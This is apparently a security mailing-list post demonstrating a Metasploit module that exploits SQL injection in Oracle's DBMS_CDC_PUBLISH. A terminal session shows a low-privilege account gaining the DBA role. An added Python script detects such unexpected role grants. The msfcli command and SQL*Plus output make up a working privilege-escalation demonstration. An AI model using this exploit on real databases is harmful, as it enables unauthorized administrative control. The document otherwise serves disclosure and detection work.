we've slowly been adding oracle support to the metasploit framework. 
the following is an example of how you can use current modules 
exploiting sql injection vulnerabilities in various packages/procedures 
using the sqlplus client.

* demo *

fueng:msf-dev mc$ ./msfcli auxiliary/admin/oracle/dbms_cdc_publish SQL="grant dba to metasploit" E
[*] Creating 'msf.sql' file ...
[*] File 'msf.sql' is located in './data/exploits/' ...

fueng:msf-dev mc$ cd instantclient_10_2/
fueng:instantclient_10_2 mc$ ./sqlplus metasploit/metaspl...@172.10.1.109/orcl

SQL*Plus: Release 10.2.0.4.0 - Production on Wed Feb 18 18:27:54 2009

Copyright (c) 1982, 2007, Oracle.  All Rights Reserved.


Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Production
With the Partitioning, OLAP and Data Mining options

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
METASPLOIT                     CONNECT                        NO  YES NO

SQL> @../data/exploits/msf.sql
                        DECLARE
*
ERROR at line 1:
ORA-01400: cannot insert NULL into ("SYS"."DBMS_LOCK_ALLOCATED"."NAME")
ORA-06512: at "SYS.DBMS_CDC_UTILITY", line 436
ORA-06512: at line 1
ORA-06512: at "SYS.DBMS_CDC_PUBLISH", line 535
ORA-06512: at line 1
ORA-06512: at line 8



Function dropped.

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
METASPLOIT                     CONNECT                        NO  YES NO
METASPLOIT                     DBA                            NO  YES NO

* *

in the near future, the addition of a mixin using 
ruby-dbi/ruby-oci8/oracle-instant-client will be added.

a demo of this can be seen here:

http://www.w00t-shell.net/demos/CVE-2008-1815-escalate.html

-- 
~ mc
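
An added example, not part of the original post or of Metasploit: a Python check that parses two role listings in the SQL*Plus column layout shown in the demo and reports roles that appeared between them, flagging administrative ones. The HIGH_PRIV_ROLES watch list, the function names and the sample rows are assumptions constructed for illustration.

```python
import re

# Assumption: roles this site treats as administrative; adjust to local policy.
HIGH_PRIV_ROLES = {"DBA", "IMP_FULL_DATABASE", "EXP_FULL_DATABASE"}

def parse_sqlplus_table(text):
    """Parse one fixed-width SQL*Plus result set into a list of dicts."""
    lines = text.splitlines()
    # The ruler of dashes under the heading gives every column's offsets.
    ruler = next((i for i, l in enumerate(lines)
                  if i > 0 and re.fullmatch(r"-+( -+)*\s*", l)), None)
    if ruler is None:
        raise ValueError("no SQL*Plus column ruler found")
    spans = [m.span() for m in re.finditer(r"-+", lines[ruler])]
    names = [lines[ruler - 1][s:e].strip() for s, e in spans]
    rows = []
    for line in lines[ruler + 1:]:
        if not line.strip():
            break  # a blank line ends the result set
        rows.append({n: line[s:e].strip() for n, (s, e) in zip(names, spans)})
    return rows

def new_grants(before_text, after_text):
    """Return (account, role, is_high_priv) for roles only in the later listing."""
    def key(row):
        # First column is USERNAME in user_role_privs, GRANTEE in dba_role_privs.
        return (next(iter(row.values())), row["GRANTED_ROLE"])
    before = {key(r) for r in parse_sqlplus_table(before_text)}
    added = [key(r) for r in parse_sqlplus_table(after_text) if key(r) not in before]
    return [(acct, role, role in HIGH_PRIV_ROLES) for acct, role in added]

def render(rows):
    """Build a constructed listing in the column layout the transcript shows."""
    fmt = "%-30s %-30s %-3s %-3s %-3s"
    head = fmt % ("USERNAME", "GRANTED_ROLE", "ADM", "DEF", "OS_")
    rule = fmt % ("-" * 30, "-" * 30, "---", "---", "---")
    return "\n".join(["SQL> select * from user_role_privs;", "", head, rule]
                     + [fmt % r for r in rows]) + "\n"

# Constructed samples mirroring the two listings in the demo.
BEFORE = render([("METASPLOIT", "CONNECT", "NO", "YES", "NO")])
AFTER = render([("METASPLOIT", "CONNECT", "NO", "YES", "NO"),
                ("METASPLOIT", "DBA", "NO", "YES", "NO")])

if __name__ == "__main__":
    for acct, role, high in new_grants(BEFORE, AFTER):
        print("%s gained %s%s" % (acct, role, "  <-- administrative role" if high else ""))
```

Run against periodic spooled listings, the same comparison surfaces a role grant that no change record accounts for.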
